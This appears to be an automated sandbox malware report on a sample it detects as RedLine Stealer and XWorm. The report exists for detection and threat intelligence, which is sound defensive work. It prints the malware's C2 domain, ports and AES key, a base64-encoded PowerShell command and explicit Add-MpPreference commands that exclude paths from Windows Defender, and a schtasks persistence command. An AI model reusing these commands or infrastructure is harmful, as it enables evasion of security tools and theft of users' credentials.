Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
f5ATZ1i5CU.exe

Overview

General Information

Sample name:f5ATZ1i5CU.exe
renamed because original name is a hash value
Original sample name:fae4297f765a1c93fef48d7bddd8c88e6361dcb7eb9efc7cb10ff050e2157d80.exe
Analysis ID:1571409
MD5:854a42e9a581b2a33ceda0f3d3dd2f04
SHA1:a100a400e570039823c4fd79dc470c13ccfbb266
SHA256:fae4297f765a1c93fef48d7bddd8c88e6361dcb7eb9efc7cb10ff050e2157d80
Tags:C2-at-pastebin-yd1QnTjKexeuser-JAMESWT_MHT
Infos:

Detection

RedLine, XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected RedLine Stealer
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses dynamic DNS services
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • f5ATZ1i5CU.exe (PID: 7928 cmdline: "C:\Users\user\Desktop\f5ATZ1i5CU.exe" MD5: 854A42E9A581B2A33CEDA0F3D3DD2F04)
    • powershell.exe (PID: 8000 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAYwB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AYgBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAYgB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAegB6ACMAPgA=" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 8024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • M2.exe (PID: 8096 cmdline: "C:\Users\user\AppData\Roaming\M2.exe" MD5: 2598B5FEE38D9C0979F009E77F94EA33)
      • conhost.exe (PID: 8136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Metin.exe (PID: 7184 cmdline: "C:\Users\user\AppData\Roaming\Metin.exe" MD5: 1D846637AA409D6DD4FD14F70A63F907)
      • powershell.exe (PID: 8144 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Metin.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1452 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Metin.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 1120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2312 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Chrome.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 4252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4456 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Chrome.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 4668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 3496 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Chrome" /tr "C:\Users\user\AppData\Roaming\Chrome.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 7936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Chrome.exe (PID: 8048 cmdline: C:\Users\user\AppData\Roaming\Chrome.exe MD5: 1D846637AA409D6DD4FD14F70A63F907)
  • Chrome.exe (PID: 7476 cmdline: "C:\Users\user\AppData\Roaming\Chrome.exe" MD5: 1D846637AA409D6DD4FD14F70A63F907)
  • Chrome.exe (PID: 5512 cmdline: "C:\Users\user\AppData\Roaming\Chrome.exe" MD5: 1D846637AA409D6DD4FD14F70A63F907)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["duclog23.duckdns.org"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}

Threatname: RedLine

{"C2 url": ["duclog23.duckdns.org:37552"], "Bot Id": "Metin"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\Metin.exeJoeSecurity_XWormYara detected XWormJoe Security
    C:\Users\user\AppData\Roaming\Metin.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      C:\Users\user\AppData\Roaming\Metin.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0xa662:$s6: VirtualBox
      • 0xa5c0:$s8: Win32_ComputerSystem
      • 0xb440:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0xb4dd:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0xb5f2:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0xb1a4:$cnc4: POST / HTTP/1.1
      C:\Users\user\AppData\Roaming\Chrome.exeJoeSecurity_XWormYara detected XWormJoe Security
        C:\Users\user\AppData\Roaming\Chrome.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
          Click to see the 5 entries

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000009.00000002.2542545307.0000000002CC2000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
            00000009.00000002.2542545307.0000000002CC2000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0x17c0a:$s6: VirtualBox
            • 0x17b68:$s8: Win32_ComputerSystem
            • 0x189e8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x18a85:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x18b9a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x1874c:$cnc4: POST / HTTP/1.1
            00000009.00000000.1268593061.0000000000972000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_XWormYara detected XWormJoe Security
              00000009.00000000.1268593061.0000000000972000.00000002.00000001.01000000.00000007.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
              • 0xa462:$s6: VirtualBox
              • 0xa3c0:$s8: Win32_ComputerSystem
              • 0xb240:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
              • 0xb2dd:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
              • 0xb3f2:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
              • 0xafa4:$cnc4: POST / HTTP/1.1
              00000009.00000002.2542545307.0000000002C01000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                Click to see the 16 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                9.0.Metin.exe.970000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                  9.0.Metin.exe.970000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                    9.0.Metin.exe.970000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                    • 0xa662:$s6: VirtualBox
                    • 0xa5c0:$s8: Win32_ComputerSystem
                    • 0xb440:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                    • 0xb4dd:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                    • 0xb5f2:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                    • 0xb1a4:$cnc4: POST / HTTP/1.1
                    1.2.f5ATZ1i5CU.exe.2e87e58.1.raw.unpackJoeSecurity_XWormYara detected XWormJoe Security
                      1.2.f5ATZ1i5CU.exe.2e87e58.1.unpackJoeSecurity_XWormYara detected XWormJoe Security
                        Click to see the 12 entries

                        Sigma Signatures

                        System Summary

                        barindex
                        Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAYwB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AYgBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAYgB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAegB6ACMAPgA=", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAYwB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AYgBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAYgB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAegB6ACMAPgA=", CommandLine|base64offset|contains: Ijw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\f5ATZ1i5CU.exe", ParentImage: C:\Users\user\Desktop\f5ATZ1i5CU.exe, ParentProcessId: 7928, ParentProcessName: f5ATZ1i5CU.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAYwB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AYgBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAYgB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAegB6ACMAPgA=", ProcessId: 8000, ProcessName: powershell.exe
                        Sigma detected: Change PowerShell Policies to an Insecure Level
                        Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Metin.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Metin.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Metin.exe" , ParentImage: C:\Users\user\AppData\Roaming\Metin.exe, ParentProcessId: 7184, ParentProcessName: Metin.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Metin.exe', ProcessId: 8144, ProcessName: powershell.exe
                        Sigma detected: CurrentVersion Autorun Keys Modification
                        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\Chrome.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\Metin.exe, ProcessId: 7184, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Chrome
                        Sigma detected: Powershell Defender Exclusion
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Metin.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Metin.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Metin.exe" , ParentImage: C:\Users\user\AppData\Roaming\Metin.exe, ParentProcessId: 7184, ParentProcessName: Metin.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Metin.exe', ProcessId: 8144, ProcessName: powershell.exe
                        Sigma detected: Startup Folder File Write
                        Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\Metin.exe, ProcessId: 7184, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome.lnk
                        Sigma detected: Suspicious Add Scheduled Task Parent
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Chrome" /tr "C:\Users\user\AppData\Roaming\Chrome.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Chrome" /tr "C:\Users\user\AppData\Roaming\Chrome.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Metin.exe" , ParentImage: C:\Users\user\AppData\Roaming\Metin.exe, ParentProcessId: 7184, ParentProcessName: Metin.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Chrome" /tr "C:\Users\user\AppData\Roaming\Chrome.exe", ProcessId: 3496, ProcessName: schtasks.exe
                        Sigma detected: Suspicious Execution of Powershell with Base64
                        Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAYwB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AYgBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAYgB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAegB6ACMAPgA=", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAYwB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AYgBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAYgB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAegB6ACMAPgA=", CommandLine|base64offset|contains: Ijw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\f5ATZ1i5CU.exe", ParentImage: C:\Users\user\Desktop\f5ATZ1i5CU.exe, ParentProcessId: 7928, ParentProcessName: f5ATZ1i5CU.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAYwB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AYgBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAYgB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAegB6ACMAPgA=", ProcessId: 8000, ProcessName: powershell.exe
                        Sigma detected: Suspicious Schtasks From Env Var Folder
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Chrome" /tr "C:\Users\user\AppData\Roaming\Chrome.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Chrome" /tr "C:\Users\user\AppData\Roaming\Chrome.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Metin.exe" , ParentImage: C:\Users\user\AppData\Roaming\Metin.exe, ParentProcessId: 7184, ParentProcessName: Metin.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Chrome" /tr "C:\Users\user\AppData\Roaming\Chrome.exe", ProcessId: 3496, ProcessName: schtasks.exe
                        Sigma detected: Non Interactive PowerShell Process Spawned
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAYwB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AYgBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAYgB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAegB6ACMAPgA=", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAYwB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AYgBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAYgB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAegB6ACMAPgA=", CommandLine|base64offset|contains: Ijw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\f5ATZ1i5CU.exe", ParentImage: C:\Users\user\Desktop\f5ATZ1i5CU.exe, ParentProcessId: 7928, ParentProcessName: f5ATZ1i5CU.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAYwB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AYgBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAYgB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAegB6ACMAPgA=", ProcessId: 8000, ProcessName: powershell.exe

                        Suricata Signatures

                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-09T11:05:00.561202+010028496621Malware Command and Control Activity Detected192.168.2.1049704192.169.69.2637552TCP
                        2024-12-09T11:05:16.188278+010028496621Malware Command and Control Activity Detected192.168.2.1049740192.169.69.2637552TCP
                        2024-12-09T11:05:31.798637+010028496621Malware Command and Control Activity Detected192.168.2.1049777192.169.69.2637552TCP
                        2024-12-09T11:05:47.256001+010028496621Malware Command and Control Activity Detected192.168.2.1049813192.169.69.2637552TCP
                        2024-12-09T11:06:02.699270+010028496621Malware Command and Control Activity Detected192.168.2.1049849192.169.69.2637552TCP
                        2024-12-09T11:06:18.133356+010028496621Malware Command and Control Activity Detected192.168.2.1049885192.169.69.2637552TCP
                        2024-12-09T11:06:33.645441+010028496621Malware Command and Control Activity Detected192.168.2.1049923192.169.69.2637552TCP
                        2024-12-09T11:06:49.183070+010028496621Malware Command and Control Activity Detected192.168.2.1049960192.169.69.2637552TCP

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Antivirus / Scanner detection for submitted sample
                        Source: f5ATZ1i5CU.exeAvira: detected
                        Antivirus detection for URL or domain
                        Source: http://duclog23.duckdns.org:37552Avira URL Cloud: Label: malware
                        Source: duclog23.duckdns.org:37552Avira URL Cloud: Label: malware
                        Source: http://duclog23.duckdns.org:37552/Avira URL Cloud: Label: malware
                        Source: http://duclog23.duckdns.orgAvira URL Cloud: Label: malware
                        Source: duclog23.duckdns.orgAvira URL Cloud: Label: malware
                        Antivirus detection for dropped file
                        Source: C:\Users\user\AppData\Roaming\Metin.exeAvira: detection malicious, Label: HEUR/AGEN.1305769
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeAvira: detection malicious, Label: HEUR/AGEN.1305769
                        Source: C:\Users\user\AppData\Roaming\M2.exeAvira: detection malicious, Label: HEUR/AGEN.1305500
                        Found malware configuration
                        Source: 00000009.00000002.2542545307.0000000002CC2000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["duclog23.duckdns.org"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
                        Source: 6.0.M2.exe.2f0000.0.unpackMalware Configuration Extractor: RedLine {"C2 url": ["duclog23.duckdns.org:37552"], "Bot Id": "Metin"}
                        Multi AV Scanner detection for dropped file
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeReversingLabs: Detection: 95%
                        Source: C:\Users\user\AppData\Roaming\M2.exeReversingLabs: Detection: 89%
                        Source: C:\Users\user\AppData\Roaming\Metin.exeReversingLabs: Detection: 95%
                        Multi AV Scanner detection for submitted file
                        Source: f5ATZ1i5CU.exeReversingLabs: Detection: 78%
                        AI detected suspicious sample
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                        Machine Learning detection for dropped file
                        Source: C:\Users\user\AppData\Roaming\Metin.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Roaming\M2.exeJoe Sandbox ML: detected
                        Machine Learning detection for sample
                        Source: f5ATZ1i5CU.exeJoe Sandbox ML: detected
                        Sample uses string decryption to hide its real strings
                        Source: 9.2.Metin.exe.2ccf5a8.0.raw.unpackString decryptor: duclog23.duckdns.org
                        Source: 9.2.Metin.exe.2ccf5a8.0.raw.unpackString decryptor: 7000
